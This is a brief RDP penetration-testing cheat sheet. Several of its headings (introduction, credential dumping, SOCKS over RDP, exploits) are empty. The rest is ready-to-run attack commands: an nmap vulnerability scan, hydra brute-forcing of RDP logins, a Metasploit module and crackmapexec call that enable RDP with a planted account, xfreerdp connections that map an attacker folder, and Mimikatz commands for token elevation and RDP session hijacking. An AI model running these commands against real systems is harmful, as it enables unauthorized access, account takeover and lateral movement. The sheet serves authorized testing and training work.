Welcome. Today I am writing about RDP penetration testing fundamentals: I will explain how to enumerate the Remote Desktop Service and how to use it to escalate privileges.

RDP Introduction

RDP Penetration Testing

RDP Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt rdp


use post/windows/manage/enable_rdp
set username rfs
set password Password123!
set session 1


crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable

Post Exploitation

Connecting to RDP

xfreerdp /v:'' /u:'' /p:''
xfreerdp /v:'' /u:'' /p:'' +clipboard
# Maps the specified folder on the attacking machine to the RDP host
xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP


RDP Exploits

